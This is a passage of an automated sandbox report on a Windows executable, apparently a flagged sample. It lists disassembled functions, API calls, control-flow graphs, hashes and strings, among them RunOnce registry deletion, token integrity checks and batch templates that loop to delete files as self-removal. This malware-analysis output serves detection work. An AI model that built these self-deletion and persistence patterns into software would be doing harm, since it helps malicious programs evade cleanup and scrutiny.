                                                                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,00000000), ref: 00D0B1C0
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,80000001,00000001,00000000), ref: 00D0B202
                                                                                                                                                                        • RegDeleteValueW.KERNEL32(?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00D0B2F6
                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,80000001,00000001,00000000,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000031,?,00000000,80000001,00000001,00000000), ref: 00D0B338
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseDelete$EnvironmentNameUserValueVariable$ErrorInfoLastQuery
                                                                                                                                                                        • String ID: Software$Software\Microsoft\Windows\CurrentVersion\RunOnce$UserDomain
                                                                                                                                                                        • API String ID: 3650088056-4079418357
                                                                                                                                                                        • Opcode ID: 526670dfa6f33f7e89fb736548a02bb9c5316dc358f61c98b3aa55648899df87
                                                                                                                                                                        • Instruction ID: 3c58d5428d5f77cb01f97495e5863992ada97fe917a34c396706eb7436ba8d61
                                                                                                                                                                        • Opcode Fuzzy Hash: 526670dfa6f33f7e89fb736548a02bb9c5316dc358f61c98b3aa55648899df87
                                                                                                                                                                        • Instruction Fuzzy Hash: A7226C70D14208DFDB14DFA8CD95BEEBBB4EF14304F208159E515B7291EBB46A88CBA1
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CF27F0 Relevance: 23.9, APIs: 9, Strings: 4, Instructions: 1187COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$HeapProcess_wcsrchr
                                                                                                                                                                        • String ID: <3$<3$<3$<3
                                                                                                                                                                        • API String ID: 3663133277-2587302598
                                                                                                                                                                        • Opcode ID: 0384505237efe84d020fc9965b41f355ba8f2324b270740dd7d7e9ddd253eaff
                                                                                                                                                                        • Instruction ID: 11192fe7da03d457b348fc426e49b7399aee67036e054bac34149acf42950e0a
                                                                                                                                                                        • Opcode Fuzzy Hash: 0384505237efe84d020fc9965b41f355ba8f2324b270740dd7d7e9ddd253eaff
                                                                                                                                                                        • Instruction Fuzzy Hash: 5DB2AA709016589FDB66CF28CC84BADBBF8AF44314F1482D9E519AB291DB70AF84CF51
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCE790 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 117memoryCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2190 cce790-cce7ed GetCurrentProcess OpenProcessToken 2192 cce7fc-cce81d GetTokenInformation 2190->2192 2193 cce7ef-cce7f7 GetLastError 2190->2193 2195 cce81f-cce828 GetLastError 2192->2195 2196 cce84b-cce84f 2192->2196 2194 cce8ba-cce8cd 2193->2194 2197 cce8dd-cce8f9 call d7fe6a 2194->2197 2198 cce8cf-cce8d6 FindCloseChangeNotification 2194->2198 2199 cce89e GetLastError 2195->2199 2200 cce82a-cce849 call ccf280 GetTokenInformation 2195->2200 2196->2199 2201 cce851-cce880 AllocateAndInitializeSid 2196->2201 2198->2197 2202 cce8a4 2199->2202 2200->2196 2200->2199 2201->2202 2203 cce882-cce89c EqualSid FreeSid 2201->2203 2206 cce8a6-cce8b3 call d80528 2202->2206 2203->2206 2206->2194
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00CCE7D8
                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000008,00000000), ref: 00CCE7E5
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00CCE7EF
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),00000000,00000000,000000FF), ref: 00CCE819
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00CCE81F
                                                                                                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),000000FF,000000FF,000000FF,000000FF), ref: 00CCE845
                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00CCE878
                                                                                                                                                                        • EqualSid.ADVAPI32(00000000,?), ref: 00CCE887
                                                                                                                                                                        • FreeSid.ADVAPI32(?), ref: 00CCE896
                                                                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 00CCE8D0
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Token$ErrorInformationLastProcess$AllocateChangeCloseCurrentEqualFindFreeInitializeNotificationOpen
                                                                                                                                                                        • String ID: <3
                                                                                                                                                                        • API String ID: 2037597787-878583566
                                                                                                                                                                        • Opcode ID: d01eae187b148888990531bf5b6358a1319a986f4db99dca44398f8d3b560707
                                                                                                                                                                        • Instruction ID: 46eafcde265b362d9fd2d3c9fe4c524bb7956e6ac8c17d253e78fe036cc61f83
                                                                                                                                                                        • Opcode Fuzzy Hash: d01eae187b148888990531bf5b6358a1319a986f4db99dca44398f8d3b560707
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C411671900219AFEF109FA6CD49BEEBBB8EF09714F10401AE511B2290DB799A48DB64
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00C8A630 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 228libraryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C8A671
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                          • Part of subcall function 00BBA140: FindResourceW.KERNEL32(00000000,?,00000006,00000000,00000000,00000000,00BBA2B8,-00000010,?,00000000), ref: 00BBA163
                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000000,00DDCDED,000000FF), ref: 00C8A744
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$DirectoryFindHeapLibraryLoadProcessResourceSystem
                                                                                                                                                                        • String ID: UxTheme.dll
                                                                                                                                                                        • API String ID: 2586271605-352951104
                                                                                                                                                                        • Opcode ID: 6c5b7e90eec531786ca98310131c315fee119b62475dcee8bcf8a44586da4261
                                                                                                                                                                        • Instruction ID: 5d5cffaed7b16e6bead2ea4f98902d933aa2cdf7c92b4df82dc2b646a52c768a
                                                                                                                                                                        • Opcode Fuzzy Hash: 6c5b7e90eec531786ca98310131c315fee119b62475dcee8bcf8a44586da4261
                                                                                                                                                                        • Instruction Fuzzy Hash: A7A1ADB0500745EFE714DF64C818B9ABBF4FF04308F14865ED4299B681D7BAA618CF95
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CCC9A0 Relevance: 4.6, APIs: 3, Instructions: 93fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,00000000,?,?,00000000), ref: 00CCCA3D
                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00CCCA9C
                                                                                                                                                                          • Part of subcall function 00BBA850: HeapAlloc.KERNEL32(?,00000000,?,1FC3D414,00000000,00DA7F70,000000FF,?,?,00E8EFDC,?,00D119F5,8000000B), ref: 00BBA89A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Find$AllocCloseFileFirstHeap
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2507753907-0
                                                                                                                                                                        • Opcode ID: caedbcfb17abad958f4cf5202330de2053ee9438ae9804c98e802aff5229f407
                                                                                                                                                                        • Instruction ID: 33421547967aba8ec48f875f0c83e55c33f25caf66ef2618baa5fabccc669d88
                                                                                                                                                                        • Opcode Fuzzy Hash: caedbcfb17abad958f4cf5202330de2053ee9438ae9804c98e802aff5229f407
                                                                                                                                                                        • Instruction Fuzzy Hash: FA31BE709046189FDB24DF15CD8DF6AB7B4EF48724F2081AEE929A3390E7715E44DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D0C2F0 Relevance: 3.1, APIs: 2, Instructions: 86filepipeCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,1FC3D414,1FC3D414,?,?,?,?,00000000), ref: 00D0C379
                                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,1FC3D414,1FC3D414,?,?,?,?,00000000,00DF4595), ref: 00D0C39A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Create$FileNamedPipe
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1328467360-0
                                                                                                                                                                        • Opcode ID: b878a9d2292f121ef70fb61af01209d1d00d36b358a12d48db10650ca2ee1410
                                                                                                                                                                        • Instruction ID: fde66132bee79cf8ec488819f3877c83dfa00d52396830bfda33701005cf83f5
                                                                                                                                                                        • Opcode Fuzzy Hash: b878a9d2292f121ef70fb61af01209d1d00d36b358a12d48db10650ca2ee1410
                                                                                                                                                                        • Instruction Fuzzy Hash: 7731E332A84745AFE720CF14CC05B9ABBA4EB01720F10C76AF9A9AB6D0D771A944CB54
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00BEB0B0 Relevance: 3.0, APIs: 2, Instructions: 21COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __set_se_translator.LIBVCRUNTIME ref: 00BEB0C8
                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00CCB960), ref: 00BEB0DE
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ExceptionFilterUnhandled__set_se_translator
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2480343447-0
                                                                                                                                                                        • Opcode ID: 55cbb5a142ea89f6e57d14f7d257f9b37fe18b66c77ef154ce5d236177b40c49
                                                                                                                                                                        • Instruction ID: 12cf670ebdb859c53cb7ebc9c7a0b5ddea20180551dbdbbac044d90312526497
                                                                                                                                                                        • Opcode Fuzzy Hash: 55cbb5a142ea89f6e57d14f7d257f9b37fe18b66c77ef154ce5d236177b40c49
                                                                                                                                                                        • Instruction Fuzzy Hash: 5DE08676A00244BFC620A3A1DC4AF6B7F58EBA6710F08846BF64477262D77498498773
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D7FABF Relevance: 2.5, APIs: 2, Instructions: 34memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,1FC3D414,?,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7FB03
                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7FB0A
                                                                                                                                                                          • Part of subcall function 00D7F977: GetProcessHeap.KERNEL32(00000000,1FC3D414,?,00D7FADD,?,?,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7F98F
                                                                                                                                                                          • Part of subcall function 00D7F977: HeapFree.KERNEL32(00000000,?,00D7FADD,?,?,?,00D12007,00000000,1FC3D414,?,00D12142), ref: 00D7F996
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                        • Opcode ID: 604cc03c0a1efb40151fc5e241d70a04c21df8cf80d80044669ea1bb24129407
                                                                                                                                                                        • Instruction ID: 5cbcfc6cf1d4b3323d5dbd561789086378c447d03089c5169f7ec3c99ba51049
                                                                                                                                                                        • Opcode Fuzzy Hash: 604cc03c0a1efb40151fc5e241d70a04c21df8cf80d80044669ea1bb24129407
                                                                                                                                                                        • Instruction Fuzzy Hash: 2EF0A732100701ABDA352B55DD19F5B7B94DF80B61F19C039F58D52160EF71D884D675
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00D11D40 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Init_thread_footer$HeapProcess
                                                                                                                                                                        • String ID: |^
                                                                                                                                                                        • API String ID: 275895251-2783013017
                                                                                                                                                                        • Opcode ID: bf1dc009f6d00b0db34acfb6ec91e339c9f29693d15df0efebd99723676c1b5a
                                                                                                                                                                        • Instruction ID: 519dba6400566e1e80cda58e9304b928c874e55d705c2038b302c6f53f998b6b
                                                                                                                                                                        • Opcode Fuzzy Hash: bf1dc009f6d00b0db34acfb6ec91e339c9f29693d15df0efebd99723676c1b5a
                                                                                                                                                                        • Instruction Fuzzy Hash: B46175B1900704DFE720CF25C45839ABFE0BF48308F148A9DD58A9B782DBB5E649CB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00CB4560 Relevance: 31.8, APIs: 8, Strings: 10, Instructions: 327libraryloaderfileCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 209 cb4560-cb459e call bbab90 212 cb461e-cb469f call bba850 call cb4a80 call ccc960 call bba380 209->212 213 cb45a0-cb45cc 209->213 230 cb46a1-cb46ca call cb4b90 call bd1a90 212->230 231 cb46f0-cb4742 call cb6470 GetModuleHandleW 212->231 218 cb45eb-cb4606 call cb6300 213->218 219 cb45ce-cb45e9 call cb6300 213->219 226 cb4609-cb461b 218->226 219->226 243 cb46cc-cb46cf 230->243 244 cb46d4-cb46ea MoveFileW call ccc960 230->244 236 cb477c-cb4783 231->236 237 cb4744-cb4758 call d80372 231->237 239 cb478c-cb479a 236->239 240 cb4785 236->240 237->236 252 cb475a-cb4779 GetProcAddress call d80328 237->252 245 cb479c-cb47b0 call d80372 239->245 246 cb47d4-cb47db 239->246 240->239 243->244 244->231 260 cb4a71-cb4a76 call d8b6e4 244->260 245->246 261 cb47b2-cb47d1 GetProcAddress call d80328 245->261 250 cb47dd 246->250 251 cb47e4-cb47f2 246->251 250->251 255 cb482c-cb4833 251->255 256 cb47f4-cb4808 call d80372 251->256 252->236 258 cb483c-cb49e7 255->258 259 cb4835 255->259 256->255 268 cb480a-cb4829 GetProcAddress call d80328 256->268 265 cb49f1-cb49f3 call c8a630 258->265 259->258 269 cb4a7b 260->269 261->246 273 cb49f8-cb4a03 265->273 268->255 273->265 275 cb4a05-cb4a25 call cb5f60 273->275 278 cb4a2f-cb4a44 275->278 279 cb4a27-cb4a2a 275->279 280 cb4a4e-cb4a70 call d7fe6a 278->280 281 cb4a46-cb4a49 278->281 279->278 281->280
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00BBAB90: GetProcessHeap.KERNEL32 ref: 00BBABE5
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBAC17
                                                                                                                                                                          • Part of subcall function 00BBAB90: __Init_thread_footer.LIBCMT ref: 00BBACA2
                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 00CB46DA
                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,?), ref: 00CB471C
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00CB4764
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDllDirectory), ref: 00CB47BC
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CB47CC
                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00CB4814
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CB4774
                                                                                                                                                                          • Part of subcall function 00D80328: EnterCriticalSection.KERNEL32(00E97DCC,?,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80332
                                                                                                                                                                          • Part of subcall function 00D80328: LeaveCriticalSection.KERNEL32(00E97DCC,?,00BBACA7,00E989FC,00E05FA0), ref: 00D80365
                                                                                                                                                                          • Part of subcall function 00D80328: RtlWakeAllConditionVariable.NTDLL ref: 00D803DC
                                                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00CB4824
                                                                                                                                                                          • Part of subcall function 00C8A630: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 00C8A671
                                                                                                                                                                        Strings
                                                                                                                                                                        • SetDllDirectory, xrefs: 00CB47B6
                                                                                                                                                                        • kernel32, xrefs: 00CB4717
                                                                                                                                                                        • SetSearchPathMode, xrefs: 00CB475E
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try del "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00CB45D2
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1del "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00CB45F7
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" SET count=0 :try %%SystemRoot%%\System32\timeout.exe 5 SET /a count=%%count%%+1rd "%s" if %%count%% GTR %lu goto breakif exist "%s" goto try:break %%SystemRoot%%\System32\attrib.exe -r ", xrefs: 00CB45F0, 00CB45FF
                                                                                                                                                                        • SetDefaultDllDirectories, xrefs: 00CB480E
                                                                                                                                                                        • @echo off %%SystemRoot%%\System32\attrib.exe -r "%s" :try rd "%s" if exist "%s" goto try%%SystemRoot%%\System32\attrib.exe -r "%s" del "%s" | cls, xrefs: 00CB45D7, 00CB45DF
                                                                                                                                                                        • kernel32.dll, xrefs: 00CB491F
                                                                                                                                                                        • @;, xrefs: 00CB48AF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.564736787.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.564720566.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565409032.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565500901.0000000000E94000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565518409.0000000000E96000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565531682.0000000000E97000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.565548172.0000000000EA1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_bb0000_SecuriteInfo.jbxd
